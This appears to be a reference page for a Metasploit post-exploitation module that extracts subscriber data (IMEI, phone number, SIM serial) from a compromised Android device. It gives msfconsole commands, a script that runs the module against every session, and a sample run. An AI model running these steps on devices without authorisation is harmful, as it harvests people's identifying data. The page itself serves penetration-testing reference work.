extracts subscriber info from target device - Metasploit


This page contains detailed information about how to use the post/android/gather/sub_info metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: extracts subscriber info from target device
Module: post/android/gather/sub_info
Source code: modules/post/android/gather/sub_info.rb
Disclosure date: -
Last modification time: 2018-10-01 16:54:46 +0000
Supported architecture(s): -
Supported platform(s): Android
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module displays the subscriber info stored on the target phone. It uses call service to get values of each transaction code like imei etc.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/android/gather/sub_info

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/android/gather/sub_info
msf post(sub_info) > show options
    ... show and set options ...
msf post(sub_info) > set SESSION session-id
msf post(sub_info) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/android/gather/sub_info")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This post-exploitation module will extract subscriber information from the target device using call service service call iphonesubinfo <transaction_code>.

Verification Steps


  1. Start msfconsole
  2. Get meterpreter session
  3. Do: use android/gather/sub_info
  4. Do: set SESSION <session id>
  5. Do: run
  6. You should be able to see the extracted subsriber information.

Options


  • SESSION - The session to run the module on.

Extracted data


  • subscribe information

Scenarios


msf5 exploit(multi/handler) > use post/android/gather/sub_info
msf5 post(android/gather/sub_info) > set session 1
session => 1
msf5 post(android/gather/sub_info) > run

[!] SESSION may not be compatible with this module.
[*] using code : 1
[*] using code : 2
[*] using code : 3
[*] using code : 4
[*] using code : 5
[*] using code : 6
[*] using code : 7
[*] using code : 8
[*] using code : 9
[*] using code : 10
[*] using code : 11
[*] using code : 12
[*] using code : 13
[*] using code : 14
[*] using code : 15
[*] using code : 16
[*] using code : 17
[*] using code : 18
[*] using code : 19
[*] using code : 20
[*] using code : 21
[*] using code : 22
[*] using code : 23
[*] using code : 24
[*] using code : 25
[*] using code : 26
[*] using code : 27
[*] using code : 28
[*] using code : 29
Subscriber info
===============

 transaction code                      value
 ----------------                      -----
 CompleteVoiceMailNumber
 CompleteVoiceMailNumberForSubscriber
 DeviceId                              86928xxxxxxxxxx
 DeviceIdForSubscriber
 DeviceSvn                             8692890262xxxxx
 GroupIdLevel1                         4042772534xxxxx
 GroupIdLevel1ForSubscriber            4042772534xxxxx
 IccSerialNumber                       ff
 IccSerialNumberForSubscriber          ff
 IccSimChallengeResponse
 ImeiForSubscriber                     8692890xxxxxxxx
 IsimChallengeResponse
 IsimDomain                            Voicemail
 IsimImpi                              Voicemail
 IsimImpu
 IsimIst
 IsimPcscf
 Line1AlphaTag
 Line1AlphaTagForSubscriber
 Line1Number                           899127217xxxxxxxxxx
 Line1NumberForSubscriber              899127217xxxxxxxxxx
 Msisdn
 MsisdnForSubscriber
 SubscriberId                          01
 SubscriberIdForSubscriber             01
 VoiceMailAlphaTag
 VoiceMailAlphaTagForSubscriber
 VoiceMailNumber
 VoiceMailNumberForSubscriber

[*] Post module execution completed
msf5 post(android/gather/sub_info) >

Go back to menu.

Msfconsole Usage


Here is how the android/gather/sub_info post exploitation module looks in the msfconsole:

msf6 > use post/android/gather/sub_info

msf6 post(android/gather/sub_info) > show info

       Name: extracts subscriber info from target device
     Module: post/android/gather/sub_info
   Platform: Android
       Arch: 
       Rank: Normal

Provided by:
  Auxilus

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module displays the subscriber info stored on the target phone. 
  It uses call service to get values of each transaction code like 
  imei etc.

Module Options


This is a complete list of options available in the android/gather/sub_info post exploitation module:

msf6 post(android/gather/sub_info) > show options

Module options (post/android/gather/sub_info):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the android/gather/sub_info post exploitation module:

msf6 post(android/gather/sub_info) > show advanced

Module advanced options (post/android/gather/sub_info):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the android/gather/sub_info module can do:

msf6 post(android/gather/sub_info) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the android/gather/sub_info post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(android/gather/sub_info) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

This module requires root permissions.


Here is a relevant code snippet related to the "This module requires root permissions." error message:

24:	    ))
25:	  end
26:	
27:	  def run
28:	    unless is_root?
29:	      print_error("This module requires root permissions.")
30:	      return
31:	    end
32:	
33:	    @transaction_codes ||= [
34:	      'DeviceId',

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Auxilus

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.